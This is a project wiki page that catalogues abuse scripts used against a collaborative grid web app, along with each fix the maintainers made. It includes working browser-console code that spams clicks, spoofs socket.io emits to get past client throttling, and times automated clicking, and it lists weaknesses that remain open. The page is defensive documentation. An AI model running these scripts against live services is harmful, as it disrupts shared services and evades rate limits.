Exploit Museum - ridhoq/pro-grid GitHub Wiki

Primitive Click Loop

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45

method

will keep the entire board white.

The inner filter and each statement actually select all the non white tiles. The problem is, It clicks so fast that it misses some, so I just run that a bunch of times to get the whole board. It's not exactly pretty, but way easier then trying to figure out when it's ok to send another click.

code

// Load jquery
var script = document.createElement('script');script.src = "http://code.jquery.com/jquery-latest.min.js";document.getElementsByTagName('head')[0].appendChild(script);

// Click the cell if it is anything but white
clickCell = function(options) {
    if (options.color != "") {
        console.logOld("Clicking row", options.row, "col", options.col);
        $(".col_" + options.row + "_" + options.col).click()
    }
}

// Intercept the console messages that are printed when a change comes over the network
console.logOld = console.log;
console.log = (function() {
    var log = console.log;
    return function() {
        log.apply(console, arguments);
        clickCell(arguments[0])
    }
})();

// Clear the entire board
for (var i = 1; i < 51; i++) {
    console.log("Starting loop", i);
    $(".g__col").filter(function(index) {
        return $(this).css('background-color') != "rgb(255, 255, 255)"
    }).each(function() {
        $(this).click()
    });
}

steps taken to mitigate

no logs on the client side
add client side throttling. Click method can only be called once per 100ms

Spoof Socket.io Emit

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45 and https://github.com/ridhoq/pro-grid/pull/56

method

Bypasses client-side throttling of click function by making a brand new io.connect and emitting messages to the server directly

##code

for (var a = "0123456789ABCDEF".split(""), b = "#", c = 0; 6 > c; c++)
                b += a[Math.round(15 * Math.random())];
d = b
c = io.connect()
e = function(a, b, c) {
        var d = ".col_" + a + "_" + b, e = document.querySelector(d);
        e.style.backgroundColor = e.style.backgroundColor ? "" : c
    };
click = function(a, b) {
        e(a, b, d), c.emit("clicked", {
            row: a,
            col: b,
            color: d
        })
    }
color = function(a,b,c){ var d = ".col_" + a + "_" + b, e = document.querySelector(d);
						return e.style.backgroundColor;}

_.throttle(a.gridClicked, 0)

fill_grid = function(){for (var y = 0; y < 32; y++){ for (var x = 0; x < 32; x++){click(y,x); }}}
clear_grid = function(){for (var y = 0; y < 32; y++){ for (var x = 0; x < 32; x++){ if (color(y,x,c) != ""){click(y,x);} }}}

steps taken to mitigate

Now you have to sign all your requests with an API key
A new API key is issued to you on connect and after each and every request made
If either the API key is missing, malformed, or not registered you are disconnected immediately

Timeout Clicker

status: fixed as of https://github.com/ridhoq/pro-grid/pull/45 and https://github.com/ridhoq/pro-grid/pull/56

method

Just runs through and clicks the grid at whatever interval you want

code

var jq = document.createElement('script');
jq.src = "//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);

var delay = 1000;
var i = 0; var x = 0;

for(i = 0; i < 32; i++) {
  for(x = 0; x < 32; x++) {
    setTimeout(
        (function(i,x) {
            return function() {
                $('.col_' + i + '_' + x).click();
            }
        })(i,x), delay);
    delay += 1000;
  }
}

steps taken to mitigate

client side throttling
server side token bucket throttling algorithm based on times between API key requests http://en.wikipedia.org/wiki/Token_bucket

note

This will still work if you simply live within the client side throttling rules. You could slowly but surely take over the grid with this code.

Advanced Bitmap Image Drawing Bot

status: will probably still compromise the app

method

examples of attacks:

for clarity: we are not responsible for what users draw on the grid

album: http://imgur.com/a/0g9Ll

evolution

bot draws crude images spelled out in black and white
we introduce API key requirement
bot now spawns up to 16 clients at once to farm API keys
bot begins drawing complex bitmap images
bot begins cycling through a slideshow of different images

evasion tactics

The bot does a couple things to avoid detection

images are drawn in random order. There is no pattern to how it renders the image
the bot spawns many clients

code

We have been unable to replicate this bot. If you know how to replicate this please contribute the code.

steps taken to mitigate

disconnect if you click too fast

unsolved problems

how to prevent many automated clients on one IP
the bot grabs the API key variable from the controller and is able to make programmatic requests
color is dictated on the client side